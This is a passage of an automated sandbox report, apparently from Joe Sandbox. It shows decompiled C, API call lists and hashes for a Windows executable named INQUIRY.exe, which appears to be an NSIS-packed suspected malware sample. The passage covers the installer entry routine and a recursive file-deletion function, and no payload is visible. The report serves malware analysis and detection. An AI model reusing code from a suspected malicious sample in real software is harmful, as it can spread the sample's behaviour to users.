403536-403538 80->84 81->54 87 403587-403589 call 40140b 81->87 92 4034f6-4034fd 83->92 93 4034b7-4034c7 CopyFileA 83->93 84->81 88 40353a-40354c GetCurrentProcess 84->88 87->54 88->81 97 40354e-403570 88->97 92->83 95 4034ff-403506 call 4057d3 92->95 93->92 96 4034c9-4034e9 call 4057d3 call 405aa7 call 4052e5 93->96 95->39 96->92 107 4034eb-4034f2 CloseHandle 96->107 97->81 107->92
                          C-Code - Quality: 83%
                          			_entry_() {
                          				struct _SHFILEINFOA _v360;
                          				struct _SECURITY_ATTRIBUTES* _v376;
                          				char _v380;
                          				CHAR* _v384;
                          				char _v396;
                          				int _v400;
                          				int _v404;
                          				CHAR* _v408;
                          				intOrPtr _v412;
                          				int _v416;
                          				intOrPtr _v420;
                          				struct _SECURITY_ATTRIBUTES* _v424;
                          				void* _v432;
                          				int _t34;
                          				CHAR* _t39;
                          				char* _t42;
                          				signed int _t44;
                          				void* _t48;
                          				intOrPtr _t50;
                          				signed int _t52;
                          				signed int _t55;
                          				int _t56;
                          				signed int _t60;
                          				intOrPtr _t71;
                          				intOrPtr _t77;
                          				void* _t79;
                          				void* _t89;
                          				void* _t91;
                          				char* _t96;
                          				signed int _t97;
                          				void* _t98;
                          				signed int _t99;
                          				signed int _t100;
                          				signed int _t103;
                          				CHAR* _t105;
                          				signed int _t106;
                          				intOrPtr _t113;
                          				char _t120;
                          
                          				_v376 = 0;
                          				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                          				_t99 = 0;
                          				_v380 = 0x20;
                          				__imp__#17();
                          				_t34 = SetErrorMode(0x8001); // executed
                          				__imp__OleInitialize(0); // executed
                          				 *0x423f58 = _t34;
                          				 *0x423ea4 = E00405DA3(8);
                          				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
                          				E00405A85("heifsmlbdxlebvytfzg Setup", "NSIS Error");
                          				_t39 = GetCommandLineA();
                          				_t96 = "\"C:\\Users\\jones\\Desktop\\INQUIRY.exe\" ";
                          				E00405A85(_t96, _t39);
                          				 *0x423ea0 = GetModuleHandleA(0);
                          				_t42 = _t96;
                          				if("\"C:\\Users\\jones\\Desktop\\INQUIRY.exe\" " == 0x22) {
                          					_v404 = 0x22;
                          					_t42 =  &M00429001;
                          				}
                          				_t44 = CharNextA(E004055A3(_t42, _v404));
                          				_v404 = _t44;
                          				while(1) {
                          					_t91 =  *_t44;
                          					_t109 = _t91;
                          					if(_t91 == 0) {
                          						break;
                          					}
                          					__eflags = _t91 - 0x20;
                          					if(_t91 != 0x20) {
                          						L5:
                          						__eflags =  *_t44 - 0x22;
                          						_v404 = 0x20;
                          						if( *_t44 == 0x22) {
                          							_t44 = _t44 + 1;
                          							__eflags = _t44;
                          							_v404 = 0x22;
                          						}
                          						__eflags =  *_t44 - 0x2f;
                          						if( *_t44 != 0x2f) {
                          							L15:
                          							_t44 = E004055A3(_t44, _v404);
                          							__eflags =  *_t44 - 0x22;
                          							if(__eflags == 0) {
                          								_t44 = _t44 + 1;
                          								__eflags = _t44;
                          							}
                          							continue;
                          						} else {
                          							_t44 = _t44 + 1;
                          							__eflags =  *_t44 - 0x53;
                          							if( *_t44 == 0x53) {
                          								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
                          								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
                          									_t99 = _t99 | 0x00000002;
                          									__eflags = _t99;
                          								}
                          							}
                          							__eflags =  *_t44 - 0x4352434e;
                          							if( *_t44 == 0x4352434e) {
                          								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
                          								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
                          									_t99 = _t99 | 0x00000004;
                          									__eflags = _t99;
                          								}
                          							}
                          							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
                          							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
                          								 *((intOrPtr*)(_t44 - 2)) = 0;
                          								_t45 = _t44 + 2;
                          								__eflags = _t44 + 2;
                          								E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t45);
                          								L20:
                          								_t105 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                          								GetTempPathA(0x400, _t105); // executed
                          								_t48 = E004031F1(_t109);
                          								_t110 = _t48;
                          								if(_t48 != 0) {
                          									L22:
                          									DeleteFileA("1033"); // executed
                          									_t50 = E00402C5B(_t111, _t99); // executed
                          									_v412 = _t50;
                          									if(_t50 != 0) {
                          										L32:
                          										E004035A6();
                          										__imp__OleUninitialize();
                          										if(_v408 == 0) {
                          											__eflags =  *0x423f34; // 0x0
                          											if(__eflags != 0) {
                          												_t106 = E00405DA3(3);
                          												_t100 = E00405DA3(4);
                          												_t55 = E00405DA3(5);
                          												__eflags = _t106;
                          												_t97 = _t55;
                          												if(_t106 != 0) {
                          													__eflags = _t100;
                          													if(_t100 != 0) {
                          														__eflags = _t97;
                          														if(_t97 != 0) {
                          															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
                          															__eflags = _t60;
                          															if(_t60 != 0) {
                          																 *_t100(0, "SeShutdownPrivilege",  &_v400);
                          																_v416 = 1;
                          																_v404 = 2;
                          																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
                          															}
                          														}
                          													}
                          												}
                          												_t56 = ExitWindowsEx(2, 0);
                          												__eflags = _t56;
                          												if(_t56 == 0) {
                          													E0040140B(9);
                          												}
                          											}
                          											_t52 =  *0x423f4c; // 0xffffffff
                          											__eflags = _t52 - 0xffffffff;
                          											if(_t52 != 0xffffffff) {
                          												_v400 = _t52;
                          											}
                          											ExitProcess(_v400);
                          										}
                          										E00405346(_v408, 0x200010);
                          										ExitProcess(2);
                          									}
                          									_t113 =  *0x423ebc; // 0x0
                          									if(_t113 == 0) {
                          										L31:
                          										 *0x423f4c =  *0x423f4c | 0xffffffff;
                          										_v400 = E004035E3();
                          										goto L32;
                          									}
                          									_t103 = E004055A3(_t96, 0);
                          									while(_t103 >= _t96) {
                          										__eflags =  *_t103 - 0x3d3f5f20;
                          										if(__eflags == 0) {
                          											break;
                          										}
                          										_t103 = _t103 - 1;
                          										__eflags = _t103;
                          									}
                          									_t115 = _t103 - _t96;
                          									_v408 = "Error launching installer";
                          									if(_t103 < _t96) {
                          										lstrcatA(_t105, "~nsu.tmp");
                          										_t101 = "C:\\Users\\jones\\Desktop";
                          										if(lstrcmpiA(_t105, "C:\\Users\\jones\\Desktop") == 0) {
                          											goto L32;
                          										}
                          										CreateDirectoryA(_t105, 0);
                          										SetCurrentDirectoryA(_t105);
                          										_t120 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
                          										if(_t120 == 0) {
                          											E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t101);
                          										}
                          										E00405A85(0x424000, _v396);
                          										 *0x424400 = 0x41;
                          										_t98 = 0x1a;
                          										do {
                          											_t71 =  *0x423eb0; // 0x51d818
                          											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)(_t71 + 0x120)));
                          											DeleteFileA(0x41f050);
                          											if(_v416 != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\INQUIRY.exe", 0x41f050, 1) != 0) {
                          												_push(0);
                          												_push(0x41f050);
                          												E004057D3();
                          												_t77 =  *0x423eb0; // 0x51d818
                          												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)(_t77 + 0x124)));
                          												_t79 = E004052E5(0x41f050);
                          												if(_t79 != 0) {
                          													CloseHandle(_t79);
                          													_v416 = 0;
                          												}
                          											}
                          											 *0x424400 =  *0x424400 + 1;
                          											_t98 = _t98 - 1;
                          										} while (_t98 != 0);
                          										_push(0);
                          										_push(_t105);
                          										E004057D3();
                          										goto L32;
                          									}
                          									 *_t103 = 0;
                          									_t104 = _t103 + 4;
                          									if(E00405659(_t115, _t103 + 4) == 0) {
                          										goto L32;
                          									}
                          									E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
                          									E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
                          									_v424 = 0;
                          									goto L31;
                          								}
                          								GetWindowsDirectoryA(_t105, 0x3fb);
                          								lstrcatA(_t105, "\\Temp");
                          								_t89 = E004031F1(_t110);
                          								_t111 = _t89;
                          								if(_t89 == 0) {
                          									goto L32;
                          								}
                          								goto L22;
                          							}
                          							goto L15;
                          						}
                          					} else {
                          						goto L4;
                          					}
                          					do {
                          						L4:
                          						_t44 = _t44 + 1;
                          						__eflags =  *_t44 - 0x20;
                          					} while ( *_t44 == 0x20);
                          					goto L5;
                          				}
                          				goto L20;
                          			}









































                          0x00403231
                          0x00403235
                          0x0040323d
                          0x0040323f
                          0x00403244
                          0x0040324f
                          0x00403256
                          0x0040325e
                          0x00403268
                          0x0040327e
                          0x0040328e
                          0x00403293
                          0x00403299
                          0x004032a0
                          0x004032b3
                          0x004032b8
                          0x004032ba
                          0x004032bc
                          0x004032c1
                          0x004032c1
                          0x004032d1
                          0x004032d7
                          0x00403340
                          0x00403340
                          0x00403342
                          0x00403344
                          0x00000000
                          0x00000000
                          0x004032dd
                          0x004032e0
                          0x004032e8
                          0x004032e8
                          0x004032eb
                          0x004032f0
                          0x004032f2
                          0x004032f2
                          0x004032f3
                          0x004032f3
                          0x004032f8
                          0x004032fb
                          0x00403330
                          0x00403335
                          0x0040333a
                          0x0040333d
                          0x0040333f
                          0x0040333f
                          0x0040333f
                          0x00000000
                          0x004032fd
                          0x004032fd
                          0x004032fe
                          0x00403301
                          0x00403309
                          0x0040330c
                          0x0040330e
                          0x0040330e
                          0x0040330e
                          0x0040330c
                          0x00403311
                          0x00403317
                          0x0040331f
                          0x00403322
                          0x00403324
                          0x00403324
                          0x00403324
                          0x00403322
                          0x00403327
                          0x0040332e
                          0x00403348
                          0x0040334b
                          0x0040334b
                          0x00403354
                          0x00403359
                          0x00403359
                          0x00403364
                          0x0040336a
                          0x0040336f
                          0x00403371
                          0x00403393
                          0x00403398
                          0x0040339f
                          0x004033a6
                          0x004033aa
                          0x00403411
                          0x00403411
                          0x00403416
                          0x00403420
                          0x0040350b
                          0x00403511
                          0x0040351c
                          0x00403525
                          0x00403527
                          0x0040352c
                          0x0040352e
                          0x00403530
                          0x00403532
                          0x00403534
                          0x00403536
                          0x00403538
                          0x00403548
                          0x0040354a
                          0x0040354c
                          0x00403559
                          0x00403568
                          0x00403570
                          0x00403578
                          0x00403578
                          0x0040354c
                          0x00403538
                          0x00403534
                          0x0040357d
                          0x00403583
                          0x00403585
                          0x00403589
                          0x00403589
                          0x00403585
                          0x0040358e
                          0x00403593
                          0x00403596
                          0x00403598
                          0x00403598
                          0x004035a0
                          0x004035a0
                          0x0040342f
                          0x00403436
                          0x00403436
                          0x004033ac
                          0x004033b2
                          0x00403401
                          0x00403401
                          0x0040340d
                          0x00000000
                          0x0040340d
                          0x004033bb
                          0x004033c8
                          0x004033bf
                          0x004033c5
                          0x00000000
                          0x00000000
                          0x004033c7
                          0x004033c7
                          0x004033c7
                          0x004033cc
                          0x004033ce
                          0x004033d6
                          0x00403442
                          0x00403447
                          0x00403456
                          0x00000000
                          0x00000000
                          0x0040345a
                          0x00403461
                          0x00403467
                          0x0040346d
                          0x00403475
                          0x00403475
                          0x00403483
                          0x0040348a
                          0x00403493
                          0x00403499
                          0x00403499
                          0x004034a5
                          0x004034ab
                          0x004034b5
                          0x004034c9
                          0x004034ca
                          0x004034cb
                          0x004034d0
                          0x004034dc
                          0x004034e2
                          0x004034e9
                          0x004034ec
                          0x004034f2
                          0x004034f2
                          0x004034e9
                          0x004034f6
                          0x004034fc
                          0x004034fc
                          0x004034ff
                          0x00403500
                          0x00403501
                          0x00000000
                          0x00403501
                          0x004033d8
                          0x004033da
                          0x004033e5
                          0x00000000
                          0x00000000
                          0x004033ed
                          0x004033f8
                          0x004033fd
                          0x00000000
                          0x004033fd
                          0x00403379
                          0x00403385
                          0x0040338a
                          0x0040338f
                          0x00403391
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403391
                          0x00000000
                          0x0040332e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004032e2
                          0x004032e2
                          0x004032e2
                          0x004032e3
                          0x004032e3
                          0x00000000
                          0x004032e2
                          0x00000000

                          APIs
                          • #17.COMCTL32 ref: 00403244
                          • SetErrorMode.KERNELBASE(00008001), ref: 0040324F
                          • OleInitialize.OLE32(00000000), ref: 00403256
                            • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                            • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                            • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                          • SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E
                            • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,heifsmlbdxlebvytfzg Setup,NSIS Error), ref: 00405A92
                          • GetCommandLineA.KERNEL32(heifsmlbdxlebvytfzg Setup,NSIS Error), ref: 00403293
                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\INQUIRY.exe" ,00000000), ref: 004032A6
                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\INQUIRY.exe" ,00000020), ref: 004032D1
                          • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
                          • DeleteFileA.KERNELBASE(1033), ref: 00403398
                          • OleUninitialize.OLE32(00000000), ref: 00403416
                          • ExitProcess.KERNEL32 ref: 00403436
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\INQUIRY.exe" ,00000000,00000000), ref: 00403442
                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\INQUIRY.exe" ,00000000,00000000), ref: 0040344E
                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
                          • DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
                          • CopyFileA.KERNEL32 ref: 004034BF
                          • CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
                          • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
                          • ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
                          • ExitProcess.KERNEL32 ref: 004035A0
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                          • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\INQUIRY.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\INQUIRY.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$heifsmlbdxlebvytfzg Setup$~nsu.tmp
                          • API String ID: 2278157092-4027426282
                          • Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                          • Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
                          • Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                          • Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 248 4053aa-4053c5 call 405659 251 4053c7-4053d9 DeleteFileA 248->251 252 4053de-4053e8 248->252 253 405572-405575 251->253 254 4053ea-4053ec 252->254 255 4053fc-40540a call 405a85 252->255 257 4053f2-4053f6 254->257 258 40551d-405523 254->258 261 405419-40541a call 4055bf 255->261 262 40540c-405417 lstrcatA 255->262 257->255 257->258 258->253 260 405525-405528 258->260 263 405532-40553a call 405d7c 260->263 264 40552a-405530 260->264 265 40541f-405422 261->265 262->265 263->253 271 40553c-405551 call 405578 call 40573d RemoveDirectoryA 263->271 264->253 268 405424-40542b 265->268 269 40542d-405433 lstrcatA 265->269 268->269 272 405438-405456 lstrlenA FindFirstFileA 268->272 269->272 286 405553-405557 271->286 287 40556a-40556d call 404e23 271->287 274 405513-405517 272->274 275 40545c-405473 call 4055a3 272->275 274->258 277 405519 274->277 282 405475-405479 275->282 283 40547e-405481 275->283 277->258 282->283 288 40547b 282->288 284 405483-405488 283->284 285 405494-4054a2 call 405a85 283->285 289 4054f2-405504 FindNextFileA 284->289 290 40548a-40548c 284->290 298 4054a4-4054ac 285->298 299 4054b9-4054c8 call 40573d DeleteFileA 285->299 286->264 292 405559-405568 call 404e23 call 4057d3 286->292 287->253 288->283 289->275 296 40550a-40550d FindClose 289->296 290->285 294 40548e-405492 290->294 292->253 294->285 294->289 296->274 298->289 301 4054ae-4054b7 call 4053aa 298->301 308 4054ea-4054ed call 404e23 299->308 309 4054ca-4054ce 299->309 301->289 308->289 311 4054d0-4054e0 call 404e23 call 4057d3 309->311 312 4054e2-4054e8 309->312 311->289 312->289
                          C-Code - Quality: 94%
                          			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                          				signed int _v8;
                          				signed int _v12;
                          				struct _WIN32_FIND_DATAA _v332;
                          				signed int _t37;
                          				char* _t49;
                          				signed int _t52;
                          				signed int _t55;
                          				signed int _t61;
                          				signed int _t63;
                          				void* _t65;
                          				signed int _t68;
                          				CHAR* _t70;
                          				CHAR* _t72;
                          				char* _t75;
                          
                          				_t72 = _a4;
                          				_t37 = E00405659(__eflags, _t72);
                          				_v12 = _t37;
                          				if((_a8 & 0x00000008) != 0) {
                          					_t63 = DeleteFileA(_t72); // executed
                          					asm("sbb eax, eax");
                          					_t65 =  ~_t63 + 1;
                          					 *0x423f28 =  *0x423f28 + _t65;
                          					return _t65;
                          				}
                          				_t68 = _a8 & 0x00000001;
                          				__eflags = _t68;
                          				_v8 = _t68;
                          				if(_t68 == 0) {
                          					L5:
                          					E00405A85(0x4214a0, _t72);
                          					__eflags = _t68;
                          					if(_t68 == 0) {
                          						E004055BF(_t72);
                          					} else {
                          						lstrcatA(0x4214a0, "\*.*");
                          					}
                          					__eflags =  *_t72;
                          					if( *_t72 != 0) {
                          						L10:
                          						lstrcatA(_t72, 0x40900c);
                          						L11:
                          						_t70 =  &(_t72[lstrlenA(_t72)]);
                          						_t37 = FindFirstFileA(0x4214a0,  &_v332);
                          						__eflags = _t37 - 0xffffffff;
                          						_a4 = _t37;
                          						if(_t37 == 0xffffffff) {
                          							L29:
                          							__eflags = _v8;
                          							if(_v8 != 0) {
                          								_t31 = _t70 - 1;
                          								 *_t31 =  *(_t70 - 1) & 0x00000000;
                          								__eflags =  *_t31;
                          							}
                          							goto L31;
                          						} else {
                          							goto L12;
                          						}
                          						do {
                          							L12:
                          							_t75 =  &(_v332.cFileName);
                          							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
                          							__eflags =  *_t49;
                          							if( *_t49 != 0) {
                          								__eflags = _v332.cAlternateFileName;
                          								if(_v332.cAlternateFileName != 0) {
                          									_t75 =  &(_v332.cAlternateFileName);
                          								}
                          							}
                          							__eflags =  *_t75 - 0x2e;
                          							if( *_t75 != 0x2e) {
                          								L19:
                          								E00405A85(_t70, _t75);
                          								__eflags = _v332.dwFileAttributes & 0x00000010;
                          								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                          									E0040573D(_t72);
                          									_t52 = DeleteFileA(_t72);
                          									__eflags = _t52;
                          									if(_t52 != 0) {
                          										E00404E23(0xfffffff2, _t72);
                          									} else {
                          										__eflags = _a8 & 0x00000004;
                          										if((_a8 & 0x00000004) == 0) {
                          											 *0x423f28 =  *0x423f28 + 1;
                          										} else {
                          											E00404E23(0xfffffff1, _t72);
                          											_push(0);
                          											_push(_t72);
                          											E004057D3();
                          										}
                          									}
                          								} else {
                          									__eflags = (_a8 & 0x00000003) - 3;
                          									if(__eflags == 0) {
                          										E004053AA(_t70, __eflags, _t72, _a8);
                          									}
                          								}
                          								goto L27;
                          							}
                          							_t61 =  *((intOrPtr*)(_t75 + 1));
                          							__eflags = _t61;
                          							if(_t61 == 0) {
                          								goto L27;
                          							}
                          							__eflags = _t61 - 0x2e;
                          							if(_t61 != 0x2e) {
                          								goto L19;
                          							}
                          							__eflags =  *((char*)(_t75 + 2));
                          							if( *((char*)(_t75 + 2)) == 0) {
                          								goto L27;
                          							}
                          							goto L19;
                          							L27:
                          							_t55 = FindNextFileA(_a4,  &_v332);
                          							__eflags = _t55;
                          						} while (_t55 != 0);
                          						_t37 = FindClose(_a4);
                          						goto L29;
                          					}
                          					__eflags =  *0x4214a0 - 0x5c;
                          					if( *0x4214a0 != 0x5c) {
                          						goto L11;
                          					}
                          					goto L10;
                          				} else {
                          					__eflags = _t37;
                          					if(_t37 == 0) {
                          						L31:
                          						__eflags = _v8;
                          						if(_v8 == 0) {
                          							L39:
                          							return _t37;
                          						}
                          						__eflags = _v12;
                          						if(_v12 != 0) {
                          							_t37 = E00405D7C(_t72);
                          							__eflags = _t37;
                          							if(_t37 == 0) {
                          								goto L39;
                          							}
                          							E00405578(_t72);
                          							E0040573D(_t72);
                          							_t37 = RemoveDirectoryA(_t72);
                          							__eflags = _t37;
                          							if(_t37 != 0) {
                          								return E00404E23(0xffffffe5, _t72);
                          							}
                          							__eflags = _a8 & 0x00000004;
                          							if((_a8 & 0x00000004) == 0) {
                          								goto L33;
                          							}
                          							E00404E23(0xfffffff1, _t72);
                          							_push(0);
                          							_push(_t72);
                          							return E004057D3();
                          						}
                          						L33:
                          						 *0x423f28 =  *0x423f28 + 1;
                          						return _t37;
                          					}
                          					__eflags = _a8 & 0x00000002;
                          					if((_a8 & 0x00000002) == 0) {
                          						goto L31;
                          					}
                          					goto L5;
                          				}
                          			}

















                          0x004053b5
                          0x004053b9
                          0x004053c2
                          0x004053c5
                          0x004053c8
                          0x004053d0
                          0x004053d2
                          0x004053d3
                          0x00000000
                          0x004053d3
                          0x004053e2
                          0x004053e2
                          0x004053e5
                          0x004053e8
                          0x004053fc
                          0x00405403
                          0x00405408
                          0x0040540a
                          0x0040541a
                          0x0040540c
                          0x00405412
                          0x00405412
                          0x0040541f
                          0x00405422
                          0x0040542d
                          0x00405433
                          0x00405438
                          0x00405448
                          0x0040544a
                          0x00405450
                          0x00405453
                          0x00405456
                          0x00405513
                          0x00405513
                          0x00405517
                          0x00405519
                          0x00405519
                          0x00405519
                          0x00405519
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040545c
                          0x0040545c
                          0x00405465
                          0x0040546b
                          0x00405470
                          0x00405473
                          0x00405475
                          0x00405479
                          0x0040547b
                          0x0040547b
                          0x00405479
                          0x0040547e
                          0x00405481
                          0x00405494
                          0x00405496
                          0x0040549b
                          0x004054a2
                          0x004054ba
                          0x004054c0
                          0x004054c6
                          0x004054c8
                          0x004054ed
                          0x004054ca
                          0x004054ca
                          0x004054ce
                          0x004054e2
                          0x004054d0
                          0x004054d3
                          0x004054d8
                          0x004054da
                          0x004054db
                          0x004054db
                          0x004054ce
                          0x004054a4
                          0x004054aa
                          0x004054ac
                          0x004054b2
                          0x004054b2
                          0x004054ac
                          0x00000000
                          0x004054a2
                          0x00405483
                          0x00405486
                          0x00405488
                          0x00000000
                          0x00000000
                          0x0040548a
                          0x0040548c
                          0x00000000
                          0x00000000
                          0x0040548e
                          0x00405492
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004054f2
                          0x004054fc
                          0x00405502
                          0x00405502
                          0x0040550d
                          0x00000000
                          0x0040550d
                          0x00405424
                          0x0040542b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004053ea
                          0x004053ea
                          0x004053ec
                          0x0040551d
                          0x00405520
                          0x00405523
                          0x00405575
                          0x00405575
                          0x00405575
                          0x00405525
                          0x00405528
                          0x00405533
                          0x00405538
                          0x0040553a
                          0x00000000
                          0x00000000
                          0x0040553d
                          0x00405543
                          0x00405549
                          0x0040554f
                          0x00405551
                          0x00000000
                          0x0040556d
                          0x00405553
                          0x00405557
                          0x00000000
                          0x00000000
                          0x0040555c
                          0x00405561
                          0x00405562
                          0x00000000
                          0x00405563
                          0x0040552a
                          0x0040552a
                          0x00000000
                          0x0040552a
                          0x004053f2
                          0x004053f6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004053f6

                          APIs
                          • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\INQUIRY.exe" ,73BCF560), ref: 004053C8
                          • lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\INQUIRY.exe" ,73BCF560), ref: 00405412
                          • lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\INQUIRY.exe" ,73BCF560), ref: 00405433
                          • lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\INQUIRY.exe" ,73BCF560), ref: 00405439
                          • FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\INQUIRY.exe" ,73BCF560), ref: 0040544A
                          • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
                          • FindClose.KERNEL32(?), ref: 0040550D
                          Strings
                          • "C:\Users\user\Desktop\INQUIRY.exe" , xrefs: 004053B4
                          • \*.*, xrefs: 0040540C
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                          • String ID: "C:\Users\user\Desktop\INQUIRY.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                          • API String ID: 2035342205-2769415763
                          • Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                          • Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
                          • Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                          • Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
